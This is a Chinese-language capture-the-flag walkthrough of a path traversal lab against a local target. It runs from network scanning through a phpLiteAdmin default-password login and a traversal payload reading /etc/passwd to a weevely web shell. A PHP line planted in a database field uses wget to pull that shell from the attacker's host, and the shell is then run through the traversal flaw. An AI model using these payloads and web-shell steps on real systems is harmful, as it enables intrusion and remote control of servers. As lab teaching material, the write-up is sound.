【CTF】路径遍历实战
kali:192.168.223.131
target:192.168.223.171
通过arp-scan -l
获取目标IP为192.168.223.171,nmap扫描一下,开放22、80、111、39682端口
nmap -p- -A 192.168.223.171
看一眼网页,是单页博客,使用web扫描工具nikto看看有没有敏感信息
nikto -h http://192.168.223.171
再开个dirb进行扫描
dirb http://192.168.223.171
扫描到一个dbadmin的文件,里面有test_db.php的文件
点开是个登陆窗口,Google搜索phpLiteAdmin默认密码是admin登陆
再通过owasp-zap进行扫描
owasp-zap //打开图形化软件
//直接输入目标网站url,开始扫描后结果都放在Alerts栏目下
由于我是kali中文版,正常应该是Alerts,Alerts里面越红表示越危险,其中第一个是一个目录遍历的漏洞,发现里面的/etc/passwd
192.168.223.171/view.php?page=../../../../../../../etc/passwd
利用weevely生成木马
//密码是123456
weevely generate 123456 /root/shell.php
利用目录遍历漏洞,创建一个shell.php的库,表名是a,里面有一个字段b,类型是text,目的是在b字段插入值,下载kali上保存的木马文件
<?php system("cd /tmp;wget http://192.168.223.131:8000/shell.php;chmod +x shell.php;");?>
通过python开启8000端口
python -m SimpleHTTPServer
访问网站保存该表的位置
192.168.223.171/view.php?page=../../../../../../../usr/databases/shell.php
此时网站将会下载文件,注意HTTPServer开启的位置下需要有木马文件,否则路径错误
此时获取文件保存位置后连接即可
weevely http://192.168.223.171/view.php?page=../../../../../../../tmp/shell.php 123456